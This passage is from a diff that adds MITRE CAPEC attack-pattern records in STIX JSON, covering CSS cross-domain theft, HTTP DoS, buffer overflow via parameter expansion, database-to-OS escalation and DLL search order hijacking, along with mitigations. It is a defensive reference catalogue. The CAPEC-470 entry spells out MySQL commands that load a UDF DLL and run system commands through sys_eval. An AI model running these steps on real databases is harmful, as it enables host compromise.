"http://cwe.mitre.org/data/definitions/149.html" + }, + { + "external_id": "CWE-177", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/177.html" + }, + { + "external_id": "CWE-838", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/838.html" + }, + { + "description": "Chris Evans, Generic cross-browser cross-domain theft, 2009--12---28", + "external_id": "REF-405", + "source_name": "reference_from_CAPEC", + "url": "http://scarybeastsecurity.blogspot.com/2009/12/generic-cross-browser-cross-domain.html" + } + ], + "id": "attack-pattern--581433c0-1d73-4975-80f1-6dcee4761bbc", + "modified": "2022-02-22T00:00:00.000Z", + "name": "Generic Cross-Browser Cross-Domain Theft", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Standard", + "x_capec_child_of_refs": [ + "attack-pattern--7f0f7de2-bf09-4f60-86bb-6933192b7128" + ], + "x_capec_domains": [ + "Software" + ], + "x_capec_extended_description": "\n By having control of some text in the victim's domain, the attacker is able to inject a seemingly valid CSS string. It does not matter if this CSS string is preceded by other data. The CSS parser will still locate the CSS string. If the attacker is able to control two injection points, one before the cross domain data that the attacker is interested in receiving and the other one after, the attacker can use this attack to steal all of the data in between these two CSS injection points when referencing the injected CSS while performing rendering on the site that the attacker controls. When rendering, the CSS parser will detect the valid CSS string to parse and ignore the data that \"does not make sense\". That data will simply be rendered. That data is in fact the data that the attacker just stole cross domain. The stolen data may contain sensitive information, such CSRF protection tokens.\n ", + "x_capec_prerequisites": [ + "No new lines can be present in the injected CSS stringProper HTML or URL escaping of the \" and ' characters is not presentThe attacker has control of two injection points: pre-string and post-string" + ], + "x_capec_resources_required": [ + "Attacker controlled site/page to render a page referencing the injected CSS string" + ], + "x_capec_skills_required": { + "High": "Ability to craft a CSS injection" + }, + "x_capec_status": "Draft", + "x_capec_typical_severity": "Medium", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Design: Prior to performing CSS parsing, require the CSS to start with well-formed CSS when it is a cross-domain load and the MIME type is broken. This is a browser level fix.", + "id": "course-of-action--ab470916-70bc-4ac8-8e6f-b924a0e868d5", + "modified": "2022-02-22T00:00:00.000Z", + "name": "coa-468-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--2069c887-d975-4ee0-993c-8379a0d1af96", + "modified": "2022-02-22T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--ab470916-70bc-4ac8-8e6f-b924a0e868d5", + "target_ref": "attack-pattern--581433c0-1d73-4975-80f1-6dcee4761bbc", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Implementation: Perform proper HTML encoding and URL escaping", + "id": "course-of-action--3b11fd1d-aa44-4c8f-a3ae-438fa37413a5", + "modified": "2022-02-22T00:00:00.000Z", + "name": "coa-468-1", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--e3d2b93d-bd3c-47a7-a5fc-75b3c56d634b", + "modified": "2022-02-22T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--3b11fd1d-aa44-4c8f-a3ae-438fa37413a5", + "target_ref": "attack-pattern--581433c0-1d73-4975-80f1-6dcee4761bbc", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An attacker performs flooding at the HTTP level to bring down only a particular web application rather than anything listening on a TCP/IP connection. This denial of service attack requires substantially fewer packets to be sent which makes DoS harder to detect. This is an equivalent of SYN flood in HTTP. The idea is to keep the HTTP session alive indefinitely and then repeat that hundreds of times. This attack targets resource depletion weaknesses in web server software. The web server will wait to attacker's responses on the initiated HTTP sessions while the connection threads are being exhausted.", + "external_references": [ + { + "external_id": "CAPEC-469", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/469.html" + }, + { + "external_id": "CWE-770", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/770.html" + }, + { + "external_id": "CWE-772", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/772.html" + }, + { + "description": "Endpoint Denial of Service: Service Exhaustion Flood", + "external_id": "T1499.002", + "source_name": "ATTACK", + "url": "https://attack.mitre.org/wiki/Technique/T1499/002" + }, + { + "description": "Robert Hansen, Slowris HTTP DoS, 2009--06---17", + "external_id": "REF-406", + "source_name": "reference_from_CAPEC", + "url": "http://ha.ckers.org/blog/20090617/slowloris-http-dos/" + } + ], + "id": "attack-pattern--aa92a904-ed9d-4dc3-a01f-c965521e9934", + "modified": "2022-09-29T00:00:00.000Z", + "name": "HTTP DoS", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Standard", + "x_capec_child_of_refs": [ + "attack-pattern--6e3dda09-c1da-4f44-a0b3-e0e3b6fe0601" + ], + "x_capec_domains": [ + "Software" + ], + "x_capec_prerequisites": [ + "HTTP protocol is usedWeb server used is vulnerable to denial of service via HTTP flooding" + ], + "x_capec_resources_required": [ + "Ability to issues hundreds of HTTP requests" + ], + "x_capec_status": "Draft", + "x_capec_typical_severity": "Low", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Configuration: Configure web server software to limit the waiting period on opened HTTP sessions", + "id": "course-of-action--cac35d87-f34b-428c-95aa-1e5963873af5", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-469-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--dd88d686-216c-4942-8543-341f79451457", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--cac35d87-f34b-428c-95aa-1e5963873af5", + "target_ref": "attack-pattern--aa92a904-ed9d-4dc3-a01f-c965521e9934", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Design: Use load balancing mechanisms", + "id": "course-of-action--f1bbdc64-6921-4303-9b24-7f7f5e1d7220", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-469-1", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--37641472-3448-4011-b562-97904650273a", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--f1bbdc64-6921-4303-9b24-7f7f5e1d7220", + "target_ref": "attack-pattern--aa92a904-ed9d-4dc3-a01f-c965521e9934", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "In this attack, the target software is given input that the adversary knows will be modified and expanded in size during processing. This attack relies on the target software failing to anticipate that the expanded data may exceed some internal limit, thereby creating a buffer overflow.", + "external_references": [ + { + "external_id": "CAPEC-47", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/47.html" + }, + { + "external_id": "CWE-120", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/120.html" + }, + { + "external_id": "CWE-119", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/119.html" + }, + { + "external_id": "CWE-118", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/118.html" + }, + { + "external_id": "CWE-130", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/130.html" + }, + { + "external_id": "CWE-131", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/131.html" + }, + { + "external_id": "CWE-74", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/74.html" + }, + { + "external_id": "CWE-20", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/20.html" + }, + { + "external_id": "CWE-680", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/680.html" + }, + { + "external_id": "CWE-697", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/697.html" + }, + { + "description": "G. Hoglund, G. McGraw, Exploiting Software: How to Break Code, 2004--02, Addison-Wesley", + "external_id": "REF-1", + "source_name": "reference_from_CAPEC" + } + ], + "id": "attack-pattern--e61f5dd9-d26e-454f-ab07-171f3dea6e73", + "modified": "2022-02-22T00:00:00.000Z", + "name": "Buffer Overflow via Parameter Expansion", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_child_of_refs": [ + "attack-pattern--77e51461-7843-411c-a90e-852498957f76" + ], + "x_capec_consequences": { + "Access_Control": [ + "Gain Privileges" + ], + "Authorization": [ + "Gain Privileges" + ], + "Availability": [ + "Unreliable Execution", + "Execute Unauthorized Commands (Run Arbitrary Code)" + ], + "Confidentiality": [ + "Gain Privileges", + "Execute Unauthorized Commands (Run Arbitrary Code)", + "Read Data" + ], + "Integrity": [ + "Modify Data", + "Execute Unauthorized Commands (Run Arbitrary Code)" + ] + }, + "x_capec_domains": [ + "Software" + ], + "x_capec_example_instances": [ + "\n Attack Example: FTP glob()\n The glob() function in FTP servers has been susceptible to attack as a result of incorrect resizing. This is an ftpd glob() Expansion LIST Heap Overflow Vulnerability. ftp daemon contains a heap-based buffer overflow condition. The overflow occurs when the LIST command is issued with an argument that expands into an oversized string after being processed by glob().\n This buffer overflow occurs in memory that is dynamically allocated. It may be possible for adversaries to exploit this vulnerability and execute arbitrary code on the affected host.\n To exploit this, the adversary must be able to create directories on the target host.\n The glob() function is used to expand short-hand notation into complete file names. By sending to the FTP server a request containing a tilde (~) and other wildcard characters in the pathname string, a remote adversary can overflow a buffer and execute arbitrary code on the FTP server to gain root privileges. Once the request is processed, the glob() function expands the user input, which could exceed the expected length. In order to exploit this vulnerability, the adversary must be able to create directories on the FTP server.\n [REF-1]See also: CVE-2001-0249", + "\n Buffer overflow in the glob implementation in libc in NetBSD-current before 20050914, and NetBSD 2.* and 3.* before 20061203, as used by the FTP daemon, allows remote authenticated users to execute arbitrary code via a long pathname that results from path expansion.\n The limit computation of an internal buffer was done incorrectly. The size of the buffer in byte was used as element count, even though the elements of the buffer are 2 bytes long. Long expanded path names would therefore overflow the buffer.See also: CVE-2006-6652" + ], + "x_capec_execution_flow": "

Execution Flow

Explore

  1. Identify target application: The adversary identifies a target application or program to perform the buffer overflow on. Adversaries often look for applications that accept user input and that perform manual memory management.

Experiment

  1. Find injection vector: The adversary identifies an injection vector to deliver the excessive content to the targeted application's buffer.

    2. Techniques
    In this attack, the normal method of providing large user input does not work. The program performs bounds checking on the user input, but not the expanded user input. The adversary needs to provide input that they believe will be expanded by the program to overflow a buffer. To identify where this is possible, an adversary either needs to have knowledge of the inner workings of the program or use a disassembler and other reverse engineering tools to guide the search.

  2. Craft overflow content: The adversary crafts the input to be given to the program. If the intent is to simply cause the software to crash, the input needs only to expand to an excessive quantity of random data. If the intent is to leverage the overflow for execution of arbitrary code, the adversary will craft input that expands in a way that not only overflows the targeted buffer but does so in such a way that the overwritten return address is replaced with one of the adversaries' choosing which points to code injected by the adversary.

    3. Techniques
    Create specific files and directories on the system and then give input using path traversal shortcuts to those directories that could expand past an input buffer.

Exploit

  1. Overflow the buffer: Using the injection vector, the adversary gives the crafted input to the program, overflowing the buffer.

", + "x_capec_likelihood_of_attack": "Medium", + "x_capec_prerequisites": [ + "The program expands one of the parameters passed to a function with input controlled by the user, but a later function making use of the expanded parameter erroneously considers the original, not the expanded size of the parameter.", + "The expanded parameter is used in the context where buffer overflow may become possible due to the incorrect understanding of the parameter size (i.e. thinking that it is smaller than it really is)." + ], + "x_capec_resources_required": [ + "Access to the program source or binary. If the program is only available in binary then a disassembler and other reverse engineering tools will be helpful." + ], + "x_capec_skills_required": { + "High": "Finding this particular buffer overflow may not be trivial. Also, stack and especially heap based buffer overflows require a lot of knowledge if the intended goal is arbitrary code execution. Not only that the adversary needs to write the shell code to accomplish their goals, but the adversary also needs to find a way to get the program execution to jump to the planted shell code. There also needs to be sufficient room for the payload. So not every buffer overflow will be exploitable, even by a skilled adversary." + }, + "x_capec_status": "Draft", + "x_capec_typical_severity": "High", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Ensure that when parameter expansion happens in the code that the assumptions used to determine the resulting size of the parameter are accurate and that the new size of the parameter is visible to the whole system", + "id": "course-of-action--f3dcafa1-68b1-4610-a489-f68adb1fcaed", + "modified": "2022-02-22T00:00:00.000Z", + "name": "coa-47-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--f17b6dc5-ba75-4137-8d20-e847c4934580", + "modified": "2022-02-22T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--f3dcafa1-68b1-4610-a489-f68adb1fcaed", + "target_ref": "attack-pattern--e61f5dd9-d26e-454f-ab07-171f3dea6e73", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An attacker is able to leverage access gained to the database to read / write data to the file system, compromise the operating system, create a tunnel for accessing the host machine, and use this access to potentially attack other machines on the same network as the database machine. Traditionally SQL injections attacks are viewed as a way to gain unauthorized read access to the data stored in the database, modify the data in the database, delete the data, etc. However, almost every data base management system (DBMS) system includes facilities that if compromised allow an attacker complete access to the file system, operating system, and full access to the host running the database. The attacker can then use this privileged access to launch subsequent attacks. These facilities include dropping into a command shell, creating user defined functions that can call system level libraries present on the host machine, stored procedures, etc.", + "external_references": [ + { + "external_id": "CAPEC-470", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/470.html" + }, + { + "external_id": "CWE-250", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/250.html" + }, + { + "external_id": "CWE-89", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/89.html" + }, + { + "description": "Bernardo Damele Assump ção Guimarães, Advanced SQL Injection to Operating System Full Control, 2009--04---10", + "external_id": "REF-408", + "source_name": "reference_from_CAPEC", + "url": "http://www.blackhat.com/presentations/bh-europe-09/Guimaraes/Blackhat-europe-09-Damele-SQLInjection-whitepaper.pdf" + } + ], + "id": "attack-pattern--35bde6ec-0a19-462c-92b4-9c481dc4986e", + "modified": "2020-12-17T00:00:00.000Z", + "name": "Expanding Control over the Operating System from the Database", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_child_of_refs": [ + "attack-pattern--42acc604-a86c-46f7-bd03-6e532c02d85e" + ], + "x_capec_domains": [ + "Software" + ], + "x_capec_execution_flow": "

Execution Flow

Explore

  1. The adversary identifies a database management system running on a machine they would like to gain control over, or on a network they want to move laterally through.

Experiment

  1. The adversary goes about the typical steps of an SQL injection and determines if an injection is possible.

  2. Once the Adversary determines that an SQL injection is possible, they must ensure that the requirements for the attack are met. These are a high privileged session user and batched query support. This is done in similar ways to discovering if an SQL injection is possible.

  3. If the requirements are met, based on the database management system that is running, the adversary will find or create user defined functions (UDFs) that can be loaded as DLLs. An example of a DLL can be found at https://github.com/rapid7/metasploit-framework/tree/master/data/exploits/mysql

  4. In order to load the DLL, the adversary must first find the path to the plugin directory. The command to achieve this is different based on the type of DBMS, but for MySQL, this can be achieved by running the command \"select @@plugin_dir\"

Exploit

  1. The DLL is then moved into the previously found plugin directory so that the contained functions can be loaded. This can be done in a number of ways; loading from a network share, writing the entire hex encoded string to a file in the plugin directory, or loading the DLL into a table and then into a file. An example using MySQL to load the hex string is as follows. select 0x4d5a9000... into dump file \"{plugin directory}\\\\udf.dll\";

  2. Once the DLL is in the plugin directory, a command is then run to load the UDFs. An example of this in MySQL is \"create function sys_eval returns string soname 'udf.dll';\" The function sys_eval is specific to the example DLL listed above.

  3. Once the adversary has loaded the desired function(s), they will use these to execute arbitrary commands on the compromised system. This is done through a simple select command to the loaded UDF. For example: \"select sys_eval('dir');\". Because the prerequisite to this attack is that the database session user is a super user, this means that the adversary will be able to execute commands with elevated privileges.

", + "x_capec_prerequisites": [ + "A vulnerable DBMS is usedA SQL injection exists that gives an attacker access to the database or an attacker has access to the DBMS via other means" + ], + "x_capec_skills_required": { + "High": "Low level knowledge of the various facilities available in different DBMS systems for interacting with the file system and operating system" + }, + "x_capec_status": "Draft", + "x_capec_typical_severity": "Very High", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Design: Follow the defensive programming practices needed to protect an application accessing the database from SQL injection", + "id": "course-of-action--95d0b674-30ae-40e9-8db2-38a8a211eb62", + "modified": "2020-12-17T00:00:00.000Z", + "name": "coa-470-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--9147a7dc-96c2-41f7-b9c5-b3ef49dcdf38", + "modified": "2020-12-17T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--95d0b674-30ae-40e9-8db2-38a8a211eb62", + "target_ref": "attack-pattern--35bde6ec-0a19-462c-92b4-9c481dc4986e", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Configuration: Ensure that the DBMS is patched with the latest security patches", + "id": "course-of-action--57dfed23-ac96-435d-9b02-e9c712b0bb48", + "modified": "2020-12-17T00:00:00.000Z", + "name": "coa-470-1", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--71f0bd8e-33e6-4ef2-8778-ffdf5c5609a9", + "modified": "2020-12-17T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--57dfed23-ac96-435d-9b02-e9c712b0bb48", + "target_ref": "attack-pattern--35bde6ec-0a19-462c-92b4-9c481dc4986e", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Design: Ensure that the DBMS login used by the application has the lowest possible level of privileges in the DBMS", + "id": "course-of-action--4c4bd6ec-b943-4f42-a425-366871f00c6c", + "modified": "2020-12-17T00:00:00.000Z", + "name": "coa-470-2", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--48504b4a-e44a-448e-a9a2-3897cd085eda", + "modified": "2020-12-17T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--4c4bd6ec-b943-4f42-a425-366871f00c6c", + "target_ref": "attack-pattern--35bde6ec-0a19-462c-92b4-9c481dc4986e", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Design: Ensure that DBMS runs with the lowest possible level of privileges on the host machine and that it runs as a separate user", + "id": "course-of-action--8a0e8a90-0024-487b-a75a-38d27942b5c3", + "modified": "2020-12-17T00:00:00.000Z", + "name": "coa-470-3", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--0e9ce000-b8ad-473e-8a4f-892b64b4c43e", + "modified": "2020-12-17T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--8a0e8a90-0024-487b-a75a-38d27942b5c3", + "target_ref": "attack-pattern--35bde6ec-0a19-462c-92b4-9c481dc4986e", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Usage: Do not use the DBMS machine for anything else other than the database", + "id": "course-of-action--a1e0c3a0-c417-4924-88b6-f2b4837968a9", + "modified": "2020-12-17T00:00:00.000Z", + "name": "coa-470-4", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--95f621c4-31d2-4fd4-89e2-7b69c24af990", + "modified": "2020-12-17T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--a1e0c3a0-c417-4924-88b6-f2b4837968a9", + "target_ref": "attack-pattern--35bde6ec-0a19-462c-92b4-9c481dc4986e", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Usage: Do not place any trust in the database host on the internal network. Authenticate and validate all network activity originating from the database host.", + "id": "course-of-action--b79a6e4c-8a5d-4123-8504-1dbec2d44717", + "modified": "2020-12-17T00:00:00.000Z", + "name": "coa-470-5", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--ca5847b9-62fc-42d7-8ec4-e4068cd7df27", + "modified": "2020-12-17T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--b79a6e4c-8a5d-4123-8504-1dbec2d44717", + "target_ref": "attack-pattern--35bde6ec-0a19-462c-92b4-9c481dc4986e", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Usage: Use an intrusion detection system to monitor network connections and logs on the database host.", + "id": "course-of-action--f47f9885-ef51-4567-94af-f8a1a131599b", + "modified": "2020-12-17T00:00:00.000Z", + "name": "coa-470-6", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--ce982c38-66be-4428-a92d-ebb29735fb27", + "modified": "2020-12-17T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--f47f9885-ef51-4567-94af-f8a1a131599b", + "target_ref": "attack-pattern--35bde6ec-0a19-462c-92b4-9c481dc4986e", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Implementation: Remove / disable all unneeded / unused functions of the DBMS system that may allow an attacker to elevate privileges if compromised", + "id": "course-of-action--82f878db-50ad-43ad-b106-177323a07ddc", + "modified": "2020-12-17T00:00:00.000Z", + "name": "coa-470-7", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--7b22a10d-ca9b-4638-b525-d142e88f10e7", + "modified": "2020-12-17T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--82f878db-50ad-43ad-b106-177323a07ddc", + "target_ref": "attack-pattern--35bde6ec-0a19-462c-92b4-9c481dc4986e", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An adversary exploits a weakness in an application's specification of external libraries to exploit the functionality of the loader where the process loading the library searches first in the same directory in which the process binary resides and then in other directories. Exploitation of this preferential search order can allow an attacker to make the loading process load the adversary's rogue library rather than the legitimate library. This attack can be leveraged with many different libraries and with many different loading processes. No forensic trails are left in the system's registry or file system that an incorrect library had been loaded.", + "external_references": [ + { + "external_id": "CAPEC-471", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/471.html" + }, + { + "external_id": "CWE-427", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/427.html" + }, + { + "description": "Hijack Execution Flow:DLL search order hijacking", + "external_id": "T1574.001", + "source_name": "ATTACK", + "url": "https://attack.mitre.org/wiki/Technique/T1574/001" + }, + { + "description": "Hijack Execution Flow: Dylib Hijacking", + "external_id": "T1574.004", + "source_name": "ATTACK", + "url": "https://attack.mitre.org/wiki/Technique/T1574/004" + }, + { + "description": "Hijack Execution Flow: Path Interception by Search Order Hijacking", + "external_id": "T1574.008", + "source_name": "ATTACK", + "url": "https://attack.mitre.org/wiki/Technique/T1574/008" + }, + { + "description": "M Trends Report, 2011, Mandiant", + "external_id": "REF-409", + "source_name": "reference_from_CAPEC", + "url": "https://www.mandiant.com" + } + ], + "id": "attack-pattern--abdd46ce-dd2d-4430-8032-aa3ee1d262fd", + "modified": "2022-09-29T00:00:00.000Z", + "name": "Search Order Hijacking", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_child_of_refs": [ + "attack-pattern--d16af13f-5e0f-4a6b-bc1f-23f733d2229b" + ], + "x_capec_domains": [ + "Software" + ], + "x_capec_example_instances": [ + "For instance, an attacker with access to the file system may place a malicious ntshrui.dll in the C:\\Windows directory. This DLL normally resides in the System32 folder. Process explorer.exe which also resides in C:\\Windows, upon trying to load the 